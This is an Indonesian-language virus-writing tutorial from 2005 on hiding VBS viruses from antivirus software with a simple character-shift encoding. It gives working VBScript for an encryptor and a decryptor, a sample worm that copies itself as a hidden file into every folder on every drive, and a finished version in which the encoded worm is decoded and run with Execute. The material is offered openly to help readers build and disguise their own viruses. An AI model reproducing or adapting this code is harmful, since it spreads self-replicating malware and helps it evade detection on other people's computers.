|
[033].
TEHNIK ENKRIPSI VIRUS VBS
------------------------------------------------------
Author : maVero
Contact : em@ilku.net
CopyLEFT (c) 2005
www.spyrozone.tk All Rights Reserved
� 05/05/2005 02:30:44 WIB
------------------------------------------------------
Melihat banyaknya email
dan forum yang menanyakan cara mengenkripsi virus vbs atau js,maka saya
mau menulis tutorial cara mengenkripsi virus vbs. Bila anda menggunakan
program atau script encrypter maka virus kamu akan didetect oleh
antivirus sebagai Encrypter.Tools atau Encrypter.Gen. Untuk itu saya
akan memberitahu cara enkripsi sederhana dan kamu dapat memilih sendiri
karakter ASCII nya.
Prinsip kerjanya begini, baca file perkarakter lalu ubah karakter demi
karakter menjadi karakter ASCII(nomor ASCII +2). Jadi hasilnya, setiap
huruf akan ditulis sebagai 2 huruf didepannya dalam tabel ASCII. Untuk
unencrypt nya kamu cukup membalikan cara kerja encrypter tadi, yaitu
mengurangkan karakter ASCIInya dengan 2. Lalu mengeksekusi yang telah
di unencrypt tadi. Teknik ini disebut enkripsi XOR.Pusing ya.. hehehe
saya juga pusing ;-) untuk meng enkripsi kamu harus mengubah semua
karakter " menjadi karakter ASCII lain, seperti �,�,�,�,�,� dll. Tapi
kamu harus tau berapa angka ASCIInya maka dari itu pertama kamu
butuh table ASCII. ;�~
Pertama, ketikan script dibawah ini untuk membuat tabel ASCII. Nah kamu
bisa memilih karakter ASCII sesuai pilihanmu.
'<----------------- awal ASCII Tabel
---------------------->
for i=0 to 256
x=x+"angka "&i&" --> "&chr(i)&vbcrlf
next
Set Anton = CreateObject("Scripting.FileSystemObject")
Set hilman=anton.createtextfile("C:\ascii.txt")
hilman.write x
hilman.close
'<----------------- akhir ASCII Tabel --------------------->
lalu simpan dengan nama ascii.vbs dan jalankan. maka di drive C: akan terdapat
file ascii.txt dan didalamnya terdapat angka beserta bentuk huruf ASCIInya dari
0 sampai 256(range ini bisa kamu pilih sendiri). Nah udah liat kan sekarang buka
virusmu ketik Ctrl+H(Replace). Isikan " pada Find what dan � pada Replace with.
Klik Replace All dan Save.
Kamu harus tau berapa angka ASCII " dan �(caranya ya liat tabel tadi ;�)
...
angka 34 --> "
angka 164 --> �
...
catatan : "jangan memilih kode ASCII yang telah ada
dalam virus kamu, karena bila di enkripsi maka akan ikut diubah menjadi tanda
kutip(").
Kedua, sekarang saatnya kita buat script encrypternya hehehe.. buka text editor
kamu dan ketik script berikut :
'<---------------- awal encryptor ---------------------->
Set Anton = CreateObject("Scripting.FileSystemObject")
Set maVero=Anton.OpenTextFile("C:\suriv.vbe")
virus=maVero.ReadAll
On Error Resume Next
VA3 = ""
For I = 1 To Len(virus)
Baca = Asc(Mid(virus, I, 1))
If Baca = 164 Then
'nah ini untuk karakter " yang kita tukar tadi..
'jadi, jika ditemukan karakter ASCII 164(�) maka..
Tukar = Chr(215)
'ubah jadi karakter ASCII 215(�)
'nah selanjutnya terserah kamu, kalau kamu mau mengubah suatu huruf menjadi
karakter ASCII yang
'spesial silahkan asal di catat dan di ingat.
ElseIf Baca = 10 Then
Tukar = Chr(28)
ElseIf Baca = 13 Then
Tukar = Chr(29)
Else
Tukar = Chr(Baca - 1)
End If
hasil=hasil & Tukar
Next
Set hilman=anton.createtextfile("C:\hasil.txt")
hilman.write hasil
hilman.close
'<----------------- akhir encryptor --------------------->
'ini contoh file C:\suriv.vbe yang dipakai pada encryptor
di atas.
'<---------[ awal contoh kode yang akan di encrypt
]------------>
On Error Resume Next
Set ElkaUNP = CreateObject(�Scripting.FileSystemObject�)
Set Padang = ElkaUNP.OpenTextFile(Wscript.ScriptFullName,1)
Kode = Padang.ReadAll
Set Drives = ElkaUNP.Drives
For each Drive in Drives
if Drive.isReady then
Periksa(Drive & �\�)
End if
Next
Sub Periksa(Target)
On Error Resume Next
Set Elektronika = ElkaUNP.GetFolder(Target)
SumBar = Target & �\ElkaUNP.vbs�
if (SumBar <> �ElkaUNP.vbs�) then
Set FT_UNP = ElkaUNP.CreateTextFile(SumBar)
FT_UNP.Write Kode
FT_UNP.Close
FT_UNP = ��
Set Atribut = ElkaUNP.GetFile(SumBar)
Atribut.Attributes = 35
SumBar = �ElkaUNP.vbs�
End if
For Each SubFolder in Elektronika.SubFolders
Periksa(SubFolder.Path)
Next
End Sub
'<---------[ akhir contoh kode yang akan di encrypt ]------------>
pada script diatas ada 3 karakter yang saya ubah jadi karakter ASCII. yaitu
karakter :
164 jadi 215
10 jadi 28
13 jadi 29 (liat aja
di tabel..;�~ huruf apa itu)
dan selain yang tiga karakter itu, angka ASCII karakter-1(jika yang terbaca
40 maka diubah jadi
chr(39) --> 40-1=39)
hasil file virus kamu yang telah di enkripsi akan ada di C:\Hasil.txt
Ketiga, copy isi file 'C:\Hasil.txt' dan buat script encrypter berikut ini :
'<------------------- awal unencryptor
--------------------->
Explorer="pastekan isi file C:\Hasil.txt diantara
tanda kutip ini. Nah karena tanda kutip ini lah
saya menyuruh kamu menukar tanda kutip dengan yang lain, karena script tidak
akan jalan kalau ada
3 atau 4 tanda kutip ;-)"
Dim Microsoft
For I = 1 To Len(Explorer)
Internet = Asc(Mid(Explorer, I, 1))
If Internet = 215 Then
'jika menemukan karakter ASCII 215 maka
Windows = Chr(34)
'akan diubah menjadi tanda " kembali. sederhana kan..
'selanjutnya hanya kebalikan dari encryptor diatas(jika 10 diubah jadi 28 maka
sekarang di
'kembalikan 28 jadi 10 ;-) dst
ElseIf Internet = 28 Then
Windows = Chr(10)
ElseIf Internet = 29 Then
Windows = Chr(13)
Else
Windows = Chr(Internet + 1)
End If
Microsoft = Microsoft & Windows
Next
Set Anton = CreateObject("Scripting.FileSystemObject")
Set hilman=anton.createtextfile("c:\hasilx.txt")
hilman.write Microsoft
hilman.close
'<------------------ akhir unencryptor --------------------->
sekarang lihat file C:\hasilx.txt nah bandingkan dengan virus yang belum di
enkrip, sama? kalau sama berarti tak ada error dalam enkripsinya.
Terakhir, tambahkan execute pada akhir unencryptor sehingga menjadi seperti
dibawah ini:
'<------------------ awal virus jadi
--------------------->
'badan virus
Explorer="&;,,,,,,,,,Z `v`k bnmsng jncd x`mf `j`m ch dmbqxos \,,,,,,,,,,,,= Nm
Dqqnq Qdrtld Mdws
Rds Dkj`TMO < Bqd`sdNaidbs'�Rbqhoshmf-EhkdRxrsdlNaidbs�( Rds O`c`mf <
Dkj`TMO-NodmSdwsEhkd'Vrb
qhos-RbqhosEtkkM`ld+0( Jncd < O`c`mf-Qd`c@kk Rds Cqhudr < Dkj`TMO-Cqhudr Enq
d`bg Cqhud hm Cq
hudr he Cqhud-hrQd`cx sgdm Odqhjr`'Cqhud % �[�( Dmc he Mdws Rta Odqhjr`'S`qfds(
Nm Dqqnq Qdrtld Mdws Rds Dkdjsqnmhj` < Dkj`TMO-FdsEnkcdq'S`qfds( RtlA`q < S`qfds
% �[Dkj`TMO-
uar� he 'RtlA`q ;= �Dkj`TMO-uar�( sgdm Rds ES^TMO <
Dkj`TMO-Bqd`sdSdwsEhkd'RtlA`q( ES^
TMO-Vqhsd Jncd ES^TMO-Bknrd ES^TMO < �� Rds @sqhats < Dkj`TMO-FdsEhkd'RtlA`q(
@sq
hats-@ssqhatsdr < 24 RtlA`q < �Dkj`TMO-uar� Dmc he Enq D`bg RtaEnkcdq hm
Dkdjsqnmhj`-RtaE
nkcdqr Odqhjr`'RtaEnkcdq-O`sg( Mdws Dmc Rta &;,,,,,,,,,Z `jghq bnmsng jncd x`mf
`j`m ch d
mbqxos \,,,,,,,,,,,,= "
'untuk unenkripsinya
Dim Microsoft
For I = 1 To Len(Explorer)
Internet = Asc(Mid(Explorer, I, 1))
If Internet = 215 Then
Windows = Chr(34)
ElseIf Internet = 28 Then
Windows = Chr(10)
ElseIf Internet = 29 Then
Windows = Chr(13)
Else
Windows = Chr(Internet + 1)
End If
Microsoft = Microsoft & Windows
Next
'untuk mengeksekusi hasil unenkripsi
Execute Microsoft
'<------------------ akhir virus jadi --------------------->
Sekian dulu tuturial enkripsi virus VBS ini sebagai jawaban atas semua email
yang
menanyakan encryptor untuk virusnya sendiri. Dengan sedikit kreatif kamu bisa
membuat encryptor kamu sendiri dari pengembangan encryptor di atas. Tutorial ini
juga sebagai jawaban atas kurang jelasnya cara mengenkripsi virus yang terdapat
saat ini. Terutama pada para pemula yang 'agak' butuh penjelasan panjang lebar.
Greet's to :
Indonesian Virus Writer dimana saja khususnya spidey yang suka membagi ilmunya
hehehe.. :�~
SECTOR'S team,SevenC,dan pembuat virus VBS.Redlof dimanapun kamu berada.
Anak Warnet Payakumbuh(RiNaL,antho,alvin-s,peri,si bos,pak guru,yudi,ade dll)
MinangCrew, Kadal_Punk, Joehuntters, Aulia Abrar, Aldi_Member, Ridho(Elka02UNP),
Adriyan, Bob dll.
Buat semua Anak Teknik Elektronika/Fakultas Teknik /UNP /Padang /SumBar
/Indonesia.
Yance,Ee(toemis),Adek,Ata,Dodi(Bolot). hidup Payobasuang! dan yang tak tersebut
namanya...
Salam.
/* ------------------------------|EOF|------------------------------ */
|